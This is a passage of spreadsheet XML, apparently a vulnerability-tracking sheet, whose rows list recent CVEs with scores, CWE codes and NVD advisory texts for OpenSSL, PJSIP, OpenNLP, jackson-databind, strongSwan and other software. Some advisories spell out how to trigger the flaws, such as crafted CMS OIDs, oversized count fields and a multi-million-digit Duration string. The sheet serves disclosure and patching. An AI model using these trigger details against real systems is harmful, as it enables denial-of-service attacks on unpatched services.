          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit 673b978, a remote out-of-bounds read and write can occur in the SDP negotiator when the remote payload-type map maintenance feature is enabled. assign_pt_and_update_map() in pjmedia/src/pjmedia/sdp_neg.c uses payload-type numbers taken from a remote SDP offer or answer to index fixed-size internal tables without sufficient bounds validation, so a crafted remote SDP can cause memory access outside those tables. The practical impact is memory corruption and denial of service; code execution is not demonstrated. This path is only reached when PJMEDIA_SDP_NEG_MAINTAIN_REMOTE_PT_MAP is enabled. The default is disabled, so default builds are not affected; the feature is an interoperability option that integrating products may enable. This issue has been patched via commit 673b978.</t>
        </is>
      </c>
      <c r="S465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57159</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63072</t>
        </is>
      </c>
      <c r="D466" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F466" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K466" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr"/>
      <c r="Q466" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R466" s="5" t="inlineStr">
        <is>
          <t>Issue summary: OpenSSL CMS decryption sizes the key-unwrap output buffer based
on querying the unwrapped key size, but the AES-WRAP-PAD unwrap primitive
can write and cleanse more bytes than that query reports, causing an 8-byte
out-of-bounds heap write.
Impact summary: An attacker who supplies a crafted CMS message can trigger a
deterministic 8-byte out-of-bounds heap write when the victim decrypts it
with CMS_decrypt(), corrupting the heap and typically resulting in a Denial
of Service.
CWE: CWE-787: Out-of-bounds Write
Description: The key-wrap OID is potentially attacker-controlled on the wire.
CMS unwrapping allows both id-aesNNN-wrap-pad and id-aesNNN-wrap ciphers.
An attacker can take a legitimate message and change a single OID byte to
select the padded variant while leaving the message otherwise valid. Since
the unwrap key is derived from the recipient's private operation (ECDH key
agreement or ML-KEM decapsulation), the RFC 5649 integrity check cannot
pass, and the decryption fails with integrity failure.
The write is a fixed-size (8-byte), fixed-value (zero) heap overflow
immediately past the allocation, requires no special configuration, and is
reachable from the public CMS_decrypt() function. The consequence is
a heap corruption leading to a Denial of Service. The fix in the CMS code
sizes the unwrap output buffer for the worst case so a failed unwrap cannot
write past the allocation.
FIPS impact: no
As the CMS code lives outside the FIPS module boundary, no FIPS
modules are affected by this CVE.</t>
        </is>
      </c>
      <c r="S466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63072</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63075</t>
        </is>
      </c>
      <c r="D467" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F467" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K467" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr"/>
      <c r="Q467" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R467" s="5" t="inlineStr">
        <is>
          <t>Issue summary: When OpenSSL processes QUIC traffic from a peer that repeatedly
sends ack-eliciting packets while not acknowledging ACK-only responses, the
QUIC stack can retain ACK-only packet metadata for the lifetime of the
connection.
Impact summary: A remote peer that can complete a QUIC handshake can
cause connection-scoped memory growth which may lead to Denial of Service
through memory exhaustion, especially with sustained traffic or many concurrent
QUIC connections.
CWE: CWE-770: Allocation of Resources Without Limits or Throttling
Description: When the OpenSSL QUIC stack sends an ACK-only packet,
there is no requirement by the QUIC protocol that the peer will acknowledge
that ACK-only packet (i.e. it is itself not ack-eliciting). However, the OpenSSL
implementation stores the metadata about the ACK frames regardless.
In and of itself that's ok, but if a malicious peer establishes a connection, and
then drives the connection such that ACK-only packets are forced from the 
OpenSSL implementation peer (i.e., by sending numerous PING frames),
and then withholding any subsequent acks for ack-eliciting data, like
legitimate data, said malicious peer can force inappropriate memory growth
on the OpenSSL peer, potentially leading to a Denial of Service.
The fix is to ensure that we account for the transmission of the ACK-only
packet in the packet histories high and low watermark without actually storing
the ACK-only packet metadata itself.
FIPS impact: no
The OpenSSL FIPS module is not affected as the QUIC code is
outside the FIPS module boundary.</t>
        </is>
      </c>
      <c r="S467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63075</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63076</t>
        </is>
      </c>
      <c r="D468" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F468" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K468" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr"/>
      <c r="Q468" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R468" s="5" t="inlineStr">
        <is>
          <t>Issue summary: OpenSSL CMP password based protection verification only
checks whether the protectionAlg parameter was not NULL and not its
ASN.1 type, before treating it as a PBMParameter. A crafted message can
contain a parameter of a different type, which is then dereferenced as an
invalid pointer.
Impact summary: A remote, unauthenticated attacker can crash an application
acting as a CMP server that accepts PBM-protected messages, or a CMP client
talking to a malicious or intercepted CMP server, resulting in a Denial of
Service.
CWE: CWE-476: NULL Pointer Dereference
Description: When verifying the password-based MAC protection of a CMP
message, OpenSSL library reads the protectionAlg algorithm parameter with
X509_ALGOR_get0(), which returns both the parameter type and its value
pointer. The value is then cast to an ASN1_STRING and treated as the
expected PBMParameter after only checking that pointer is not NULL. The
parameter type returned by X509_ALGOR_get0() was never consulted.
This happens during protection verification, before any MAC is computed, so
no knowledge of the PBM shared secret is required; the only precondition is
that PBM verification is reachable. On the server side this is reached from
OSSL_CMP_SRV_process_request() for any application that stands up a CMP
server accepting PBM-protected messages, and on the client side from CMP
response validation against a malicious or on-path (MITM) server. The
reliable consequence is a denial of service; there is no memory disclosure,
no controlled memory write, and no path to code execution. CMP is a
specialized feature that an application must explicitly enable.
FIPS impact: no
As the CMP code lives outside the FIPS module boundary, no FIPS modules
are affected by this CVE.</t>
        </is>
      </c>
      <c r="S468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63076</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67211</t>
        </is>
      </c>
      <c r="D469" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F469" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr">
        <is>
          <t>apache:opennlp</t>
        </is>
      </c>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr"/>
      <c r="Q469" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R469" s="5" t="inlineStr">
        <is>
          <t>OOM Denial of Service via Unbounded Map Pre-Sizing in Apache OpenNLP SymSpellModelSerializer
Versions Affected: 
- 3.0.0-M4
- 3.0.0-M5
(The opennlp-spellcheck extension was introduced in 3.0.0-M4. Releases 1.x and 2.x do not contain the affected code.)
Description:
The SymSpellModelSerializer.create() method reads two 32-bit signed integer count fields (unigramCount and bigramCount) from a binary SymSpell model stream and passes each value directly to LinkedHashMap.newLinkedHashMap() after validating only that it is non-negative. No upper bound is applied, so the count is fully attacker-controlled when the model file originates from an untrusted source.
A crafted .bin model file in which either count field is set to Integer.MAX_VALUE (or any value large enough to exhaust the available heap) causes the map to be pre-sized to a capacity of 2^30 entries. The oversized backing array is allocated on the first put() into that map, requesting 4–8 GB depending on whether compressed oops are in effect, and the load fails with an OutOfMemoryError. Because the count fields sit immediately after a fixed-size header (magic, format version, three UTF strings, the configuration fields, and the edit-distance identifier) the attacker pays no meaningful size cost to weaponize a payload: a file of well under 100 bytes plus a single real entry is sufficient to crash a JVM that loads it.
Any code path that deserializes a SymSpell model is affected, including SymSpellModels.deserialize(InputStream), SymSpellModels.fromBytes(byte[]), classpath model loading via SymSpellModelResolver.resolveByLanguage(String), the CorrectTextTool command-line tool, and model-archive loading through the registered ArtifactSerializer. The opennlp-spellcheck extension ships in the official OpenNLP binary distribution.
The practical impact is denial of service against processes that load SymSpell model files from untrusted or semi-trusted origins.
Mitigation:
- 3.x users should upgrade to 3.0.0-M6.
Note: The fix applies an upper bound to both count fields, checked before the map is pre-sized; counts that are negative or exceed the bound cause an IOException to be thrown and the read to fail fast with no large allocation. The bound is the existing AbstractModelReader.MAX_ENTRIES limit introduced earlie, which the current change promotes to public visibility so that serializers implementing their own binary format can share it. The default bound is 10,000,000, which is well above the entry counts of legitimate SymSpell dictionaries but far below any value that would threaten heap exhaustion. Deployments that legitimately need to load larger dictionaries can raise the limit at JVM startup by setting the OPENNLP_MAX_ENTRIES system property to the desired positive integer (e.g. -DOPENNLP_MAX_ENTRIES=50000000); invalid or non-positive values fall back to the default. Note that this property is shared with the model-reader limit and raising it relaxes both.
Users who cannot upgrade immediately should treat all SymSpell .bin model files as untrusted input unless their provenance is verified, and should avoid loading models supplied by end users or fetched from third-party repositories without integrity checks.</t>
        </is>
      </c>
      <c r="S469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67211</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68497</t>
        </is>
      </c>
      <c r="D470" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F470" s="5" t="inlineStr">
        <is>
          <t>36c7be3b-2937-45df-85ea-ca7133ea542c</t>
        </is>
      </c>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr">
        <is>
          <t>jackson-databind, fasterxml</t>
        </is>
      </c>
      <c r="K470" s="5" t="inlineStr"/>
      <c r="L470" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr"/>
      <c r="Q470" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="R470" s="5" t="inlineStr">
        <is>
          <t>jackson-databind binds a JSON string to a javax.xml.datatype.Duration or javax.xml.datatype.XMLGregorianCalendar field by passing the raw string verbatim to DatatypeFactory.newDuration(value) or newXMLGregorianCalendar(value) in CoreXMLDeserializers.Std._deserialize. These deserializers are registered by default with no opt-in, so a plain ObjectMapper or JsonMapper with no polymorphic typing and no special configuration reaches this path. The XML Schema lexical grammar permits numeric components of arbitrary length, which the JDK materializes through the native BigInteger(String) and BigDecimal(String) constructors, both quadratic in digit count. Because the digits sit inside a JSON string token rather than a JSON number token, jackson-core's StreamReadConstraints.maxNumberLength guard never applies; jackson's own NumberDeserializers call validateIntegerLength or validateFPLength before parsing a stringified number, but the XML datatype deserializer omits that pre-check. An unauthenticated attacker can therefore submit a single request of a few megabytes, such as a Duration value consisting of the letter P followed by several million digits and the letter Y, and force tens of seconds to several minutes of single-threaded CPU work; a handful of concurrent requests can saturate a server's worker threads. This affects com.fasterxml.jackson.core:jackson-databind from 2.0.0 before 2.18.10, from 2.19.0 before 2.21.6, and from 2.22.0 before 2.22.2, and tools.jackson.core:jackson-databind from 3.0.0 before 3.1.6 and from 3.2.0 before 3.2.2. Users should upgrade to 2.18.10, 2.21.6, 2.22.2, 3.1.6, or 3.2.2.</t>
        </is>
      </c>
      <c r="S470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68497</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71641</t>
        </is>
      </c>
      <c r="D471" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F471" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G471" s="5" t="inlineStr"/>
      <c r="H471" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I471" s="5" t="inlineStr"/>
      <c r="J471" s="5" t="inlineStr"/>
      <c r="K471" s="5" t="inlineStr"/>
      <c r="L471" s="5" t="inlineStr"/>
      <c r="M471" s="5" t="inlineStr"/>
      <c r="N471" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O471" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P471" s="5" t="inlineStr"/>
      <c r="Q471" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R471" s="5" t="inlineStr">
        <is>
          <t>An issue in ZJU-FAST-Lab EGO-Planner-v2 All versions up to commit 5c99a95880401e2599638d567abc0e240396cb42 allows an attacker to cause a denial of service via thenteraction between traj_server, poscmd_2_odom, and the EGOReplanFSM emergency recovery logic</t>
        </is>
      </c>
      <c r="S471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71641</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71646</t>
        </is>
      </c>
      <c r="D472" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E472" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F472" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G472" s="5" t="inlineStr"/>
      <c r="H472" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I472" s="5" t="inlineStr"/>
      <c r="J472" s="5" t="inlineStr"/>
      <c r="K472" s="5" t="inlineStr"/>
      <c r="L472" s="5" t="inlineStr"/>
      <c r="M472" s="5" t="inlineStr"/>
      <c r="N472" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O472" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P472" s="5" t="inlineStr"/>
      <c r="Q472" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R472" s="5" t="inlineStr">
        <is>
          <t>An issue in Robotics-STAR-Lab (SYSU STAR Group) RACER Tested affected version: commit abcdef1234567890 allows an attacker to cause a denial of service via the FastExplorationFSM::optTimerCallback() in swarm_exploration/exploration_manager/src/fast_exploration_fsm.cpp</t>
        </is>
      </c>
      <c r="S472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71646</t>
        </is>
      </c>
    </row>
    <row r="473">
      <c r="A473" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B473" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73017</t>
        </is>
      </c>
      <c r="D473" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E473" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F473" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G473" s="5" t="inlineStr"/>
      <c r="H473" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I473" s="5" t="inlineStr"/>
      <c r="J473" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K47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73" s="5" t="inlineStr"/>
      <c r="M473" s="5" t="inlineStr"/>
      <c r="N473" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O473" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P473" s="5" t="inlineStr"/>
      <c r="Q473" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R473" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t>
        </is>
      </c>
    </row>
    <row r="474">
      <c r="A474" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B474" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73785</t>
        </is>
      </c>
      <c r="D474" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E474" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F474" s="5" t="inlineStr">
        <is>
          <t>security-alert@hpe.com</t>
        </is>
      </c>
      <c r="G474" s="5" t="inlineStr"/>
      <c r="H474" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I474" s="5" t="inlineStr"/>
      <c r="J474" s="5" t="inlineStr"/>
      <c r="K474" s="5" t="inlineStr"/>
      <c r="L474" s="5" t="inlineStr"/>
      <c r="M474" s="5" t="inlineStr"/>
      <c r="N474" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O474" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P474" s="5" t="inlineStr"/>
      <c r="Q474" s="5" t="inlineStr">
        <is>
          <t>CWE-241</t>
        </is>
      </c>
      <c r="R474" s="5" t="inlineStr">
        <is>
          <t>A potential security vulnerability in HPE IceWall Federation Agent and Proxy could allow a remote unauthenticated attacker to cause a denial of service (DoS).</t>
        </is>
      </c>
      <c r="S474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73785</t>
        </is>
      </c>
    </row>
    <row r="475">
      <c r="A475" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B475" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77108</t>
        </is>
      </c>
      <c r="D475" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E475" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F475" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G475" s="5" t="inlineStr"/>
      <c r="H475" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I475" s="5" t="inlineStr"/>
      <c r="J475" s="5" t="inlineStr"/>
      <c r="K475" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L475" s="5" t="inlineStr"/>
      <c r="M475" s="5" t="inlineStr"/>
      <c r="N475" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O475" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P475" s="5" t="inlineStr"/>
      <c r="Q475" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R475" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to sensitive information. Exploitation of this issue does not require user interaction.</t>
        </is>
      </c>
      <c r="S475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77108</t>
        </is>
      </c>
    </row>
    <row r="476">
      <c r="A476" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B476" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77807</t>
        </is>
      </c>
      <c r="D476" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E476" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F476" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G476" s="5" t="inlineStr"/>
      <c r="H476" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I476" s="5" t="inlineStr"/>
      <c r="J476" s="5" t="inlineStr"/>
      <c r="K476" s="5" t="inlineStr"/>
      <c r="L476" s="5" t="inlineStr"/>
      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr"/>
      <c r="Q476" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R476" s="5" t="inlineStr">
        <is>
          <t>The AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 11.0.4 via the `user[name]` Parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. Exploitation requires "Embed images" option in AcyMailing configuration being enabled.</t>
        </is>
      </c>
      <c r="S476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77807</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78130</t>
        </is>
      </c>
      <c r="D477" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E477" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F477" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr"/>
      <c r="K477" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr"/>
      <c r="Q477" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R477" s="5" t="inlineStr">
        <is>
          <t>strongSwan 4.2.0 through 6.0.7 has a NULL pointer dereference in the x509 plugin's attribute certificate parser.</t>
        </is>
      </c>
      <c r="S477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78130</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78132</t>
        </is>
      </c>
      <c r="D478" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E478" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F478" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr"/>
      <c r="K478" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr"/>
      <c r="Q478" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R478" s="5" t="inlineStr">
        <is>
          <t>strongSwan 5.1.3 through 6.0.7 has an infinite loop in the x509 plugin's attribute certificate parser for ietfAttrSyntax.</t>
        </is>
      </c>
      <c r="S478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78132</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
